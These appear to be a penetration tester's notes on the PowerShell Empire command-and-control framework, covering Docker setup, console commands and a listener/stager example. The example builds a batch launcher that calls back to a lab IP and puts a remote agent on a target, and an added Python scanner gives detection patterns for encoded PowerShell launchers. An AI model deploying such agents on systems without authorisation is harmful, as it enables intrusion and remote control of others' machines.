PowerShell Empire is a penetration testing framework based on PowerShell and Python.

Do not use PowerShell Empire

PowerShell Empire is obsolete by modern standards: most EDR solutions now monitor PowerShell closely (script block logging, command-line inspection), so its launchers and agents are readily detected.
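What that monitoring looks like in practice, as an added example that is not part of the original notes and not Empire's code: a small Python scanner over constructed PowerShell command lines (not real logs) that flags the powershell.exe switch combination typical of a hidden, non-interactive, encoded launcher and decodes the -EncodedCommand blob for the analyst. The sample lines, indicator names and scoring threshold are assumptions.

```python
import base64
import re

# Constructed sample command lines in the shape a process-creation or
# script-block log records them; they are not real captures or Empire output.
SAMPLE_LOG_LINES = [
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "
    + base64.b64encode("$x='nothing'".encode("utf-16le")).decode(),
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"',
]

# powershell.exe switches (and their accepted abbreviations) that monitoring
# weights heavily when several occur on one command line.
SUSPICIOUS_SWITCHES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass_policy": re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I),
    # -e / -ec / -enc / -EncodedCommand take base64 of UTF-16LE script text
    "encoded_command": re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
}


def analyze_command_line(cmd):
    """Return matched indicator names, a score, and the decoded -Enc script."""
    hits, decoded = [], None
    for name, pattern in SUSPICIOUS_SWITCHES.items():
        match = pattern.search(cmd)
        if not match:
            continue
        hits.append(name)
        if name == "encoded_command":
            try:
                decoded = base64.b64decode(match.group(1)).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                decoded = None  # malformed blob: still keep the indicator hit
    return {"hits": hits, "score": len(hits), "decoded": decoded}


def scan(lines, threshold=3):
    """Keep only lines that trip at least `threshold` indicators at once."""
    results = []
    for line in lines:
        verdict = analyze_command_line(line)
        if verdict["score"] >= threshold:
            results.append({"line": line, **verdict})
    return results
```

A legitimate admin script with a single switch (the second sample) stays below the threshold, while the launcher-style line trips all five indicators.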

Setup

Kali should have a working version installed already. DO NOT upgrade it: the upgrade changes the Python version and breaks the script.

If it doesn't work anymore, use the Docker image instead.

# in root shell
apt update && apt install docker.io jq
docker pull empireproject/empire
docker volume create empire-data
# link the volume's host mountpoint to the path Empire expects
mkdir -p /opt/Empire/ && ln -s "$(docker volume inspect empire-data | jq -r '.[0].Mountpoint')" /opt/Empire/data
docker run -it --name empire -v empire-data:/opt/Empire/data \
  -p 443:443 --entrypoint bash empireproject/empire
# to start the image next time: docker start -ai empire

General

Tools

  • useTOOL: enter the TOOL context, e.g. uselistener
  • useTOOL NAME: select a tool
  • info: show general info and options for the currently activated tool
  • set OPTION VALUE: set an option
  • execute: start the tool
  • back: leave the current context

Agents

  • agents: list active agents (compromised machines)
  • interact AGENT_NAME: interact with an agent / execute commands
  • sysinfo: display agent info
  • ps: list processes
  • psinject LISTENER PID: migrate into the given PID and communicate using the given listener (you have to switch manually to the newly created agent after the migration completes)

Types of Tools

  • Listener: handles incoming connections from payloads
  • Stager: generates a payload

Listener and Stager Example

# in empire
listeners
uselistener http
set Host 192.168.131.10
execute
back
usestager windows/launcher_bat
set Listener http
execute

# now upload and execute /tmp/launcher.bat

# in empire, once an agent connects
agents # look for the new agent name
interact ABCD1234

# type away~